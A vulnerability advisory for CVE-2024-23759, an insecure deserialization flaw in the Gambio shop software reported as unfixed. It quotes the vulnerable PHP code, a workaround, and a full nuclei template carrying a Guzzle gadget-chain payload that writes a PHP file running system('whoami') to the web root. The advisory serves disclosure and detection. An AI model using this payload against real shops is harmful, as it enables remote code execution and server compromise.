CVE Number<\/strong>: CVE-2024-23759<\/p>\nDescription<\/h3>\n
Gambio is software designed for running online shops.
It provides various features and tools to help businesses manage their inventory, process orders, and handle customer interactions.<\/p>\n
According to their homepage, the software is used by more than 25.000 shops.<\/p>\n
The identified vulnerability within Gambio pertains to an insecure deserialization flaw, which ultimately allows an attacker to execute remote code on affected systems.
Deserialization is a process that restores objects from their serialized form, often used for the exchange of data between different applications or components within a software system.
However, if this process is not adequately implemented or secured, it can be exploited by malicious actors to execute arbitrary code remotely.<\/p>\n
Note:<\/strong> Upon discovery, our team immediately initiated the responsible disclosure process by contacting the vendor behind Gambio.
Unfortunately, despite multiple attempts, our attempts to engage the vendor in resolving this issue have been met with silence.
The vulnerability is still unfixed.<\/p>\nThe insecure deserialization vulnerability discovered in Gambio poses a significant risk to affected systems.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.<\/p>\n
<\/p>\n
Proof of Concept<\/h3>\n
The \"search\" parameter of the \"Parcelshopfinder\/AddAddressBookEntry\" function is deserialized.<\/p>\n
The ParcelshopfinderController.inc.php<\/strong> file contains the vulnerable function in line 291:<\/p>\n\n
<\/span> $postnumber = abs(filter_var($postnumber, FILTER_SANITIZE_NUMBER_INT));<\/span> if ($postnumber == 0 || $this->isValidPostnummer($postnumber) !== true) {<\/span> $search = unserialize(base64_decode($this->_getPostData('search')));<\/span> $psfParams = [<\/span> 'street' => $search[0],<\/span> 'house' => $search[1],<\/span> 'zip' => $search[2],<\/span> 'city' => $search[3],<\/span> 'country' => $search[4],<\/span> 'firstname' => $firstname,<\/span> 'lastname' => $lastname,<\/span> 'postnumber' => $postnumber,<\/span> 'additional_info' => $additional_info,<\/span> 'error' => 'invalid_postnumber',<\/span> ];<\/span> }<\/span><\/pre>\n<\/div>\nThe serialized data must be base64 encoded, as shown in line 3 in the snippet above.
The application is using \"Guzzle\" which can be used as a gadget chain to receive arbitrary code execution by writing arbitrary files.<\/p>\n
The following nuclei template was created to check for the vulnerability:<\/p>\n
\n
<\/span>id<\/span>:<\/span> <\/span>gambio-php-object-injection<\/span>info<\/span>:<\/span> <\/span>name<\/span>:<\/span> <\/span>PHP Object injection in Gambio<\/span> <\/span>description<\/span>:<\/span> <\/span>PHP object injection in Gambio. Writes a file into the web root as a proof<\/span> <\/span>tags<\/span>:<\/span> <\/span>gambio,php<\/span> <\/span>author<\/span>:<\/span> <\/span>ChristianPoeschl,LukasSchraven<\/span> <\/span>severity<\/span>:<\/span> <\/span>critical <\/span>variables<\/span>:<\/span> <\/span>gambiouser<\/span>:<\/span> <\/span>\"{{rand_base(10)}}\"<\/span> <\/span>filename<\/span>:<\/span> <\/span>\"my_products.php\"<\/span> <\/span>payload2<\/span>:<\/span> <\/span>\"<?php<\/span> <\/span>echo<\/span> <\/span>system('whoami');?>\"<\/span> d<\/span>ata<\/span>:<\/span> <\/span>'O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:36:\"{{hex_decode(\"00\")}}GuzzleHttp\\Cookie\\CookieJar{{hex_decode(\"00\")}}cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"{{hex_decode(\"00\")}}GuzzleHttp\\Cookie\\SetCookie{{hex_decode(\"00\")}}data\";a:9:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:{{len(payload2)}}:\"{{payload2}}\";s:4:\"Path\";s:1:\"\/\";s:4:\"Name\";s:4:\"test\";s:6:\"Domain\";s:13:\"test.test.com\";s:6:\"Secure\";b:0;s:8:\"Httponly\";b:0;s:7:\"Max-Age\";i:3;}}}s:39:\"{{hex_decode(\"00\")}}GuzzleHttp\\Cookie\\CookieJar{{hex_decode(\"00\")}}strictMode\";N;s:41:\"{{hex_decode(\"00\")}}GuzzleHttp\\Cookie\\FileCookieJar{{hex_decode(\"00\")}}filename\";s:{{len(filename)}}:\"{{filename}}\";s:52:\"{{hex_decode(\"00\")}}GuzzleHttp\\Cookie\\FileCookieJar{{hex_decode(\"00\")}}storeSessionCookies\";b:1;}'<\/span>http<\/span>:<\/span> <\/span># create guest user<\/span> <\/span>-<\/span> <\/span>raw<\/span>:<\/span> <\/span>-<\/span> | <\/span>POST \/shop.php?do=CreateGuest\/Proceed HTTP\/1.1<\/span> <\/span>Host: {{Hostname}}<\/span> <\/span>Content-Type: application\/x-www-form-urlencoded<\/span><\/pre>\n \u00a0\u00a0\u00a0\u00a0 <\/span>firstname=vvvv&lastname=vvvv&email_address={{gambiouser}}%40example.com&email_address_confirm={{gambiouser}}%40example.com&b2b_status=0&company=&vat=&street_address=asd%3C+1&postcode=11111&city=11111&country=81&telephone=%2B4912312312312&fax=&action=process
<\/span> <\/span># attack
<\/span> <\/span>-<\/span> <\/span>raw<\/span>:
<\/span> <\/span>-<\/span> <\/span>|
<\/span> <\/span>POST \/shop.php?do=Parcelshopfinder\/AddAddressBookEntry HTTP\/1.1
<\/span> <\/span>Host: {{Hostname}}
<\/span> <\/span>Content-Type: application\/x-www-form-urlencoded<\/span><\/pre>\n <\/p>\n
<\/p>\n
<\/span>checkout_started=0&search={{base64(data)}}&street_address=t&house_number=1&additional_info=&postcode=1&city=t&country=DE&firstname=t&lastname=t&postnumber=111111&psf_name=t
<\/span>
<\/span>matchers<\/span>:
<\/span> <\/span>-<\/span> <\/span>type<\/span>:<\/span> <\/span>dsl
<\/span> <\/span>name<\/span>:<\/span> <\/span>php-version-payload-mismatch
<\/span> <\/span>dsl<\/span>:
<\/span> <\/span>-<\/span> <\/span>status_code == 500 && !contains(body, \"Cannot use object of type GuzzleHttp\")
<\/span> <\/span>-<\/span> <\/span>type<\/span>:<\/span> <\/span>dsl
<\/span> <\/span>dsl<\/span>:
<\/span> <\/span>-<\/span> <\/span>status_code == 500 && contains(body, \"Cannot use object of type GuzzleHttp\")<\/span><\/p>\n<\/div>\nIn the first step, a new guest user is created. This can be done in an automated way, while normal<\/em> user accounts need to solve a captcha.
The template is creating a new file \"my_products.php\" containing the current username.<\/p>\nFix<\/h3>\n
It is recommended to deserialize objects only from trusted sources.<\/p>\n
To workaround the vulnerability, Gambio users can disable the functionality the hard way and add a die('disabled')<\/strong> after line 257. Similar to the snippet below:<\/p>\n\n
<\/span> public function actionAddAddressBookEntry()<\/span> {<\/span> die('disabled');<\/span> if (empty($_SESSION['customer_id'])) {<\/span> return MainFactory::create('RedirectHttpControllerResponse', xtc_href_link(FILENAME_DEFAULT, '', 'SSL'));<\/span> }<\/span><\/pre>\n<\/div>\nPlease pay attention that this may break some functionality, as this workaround was not tested!<\/p>\n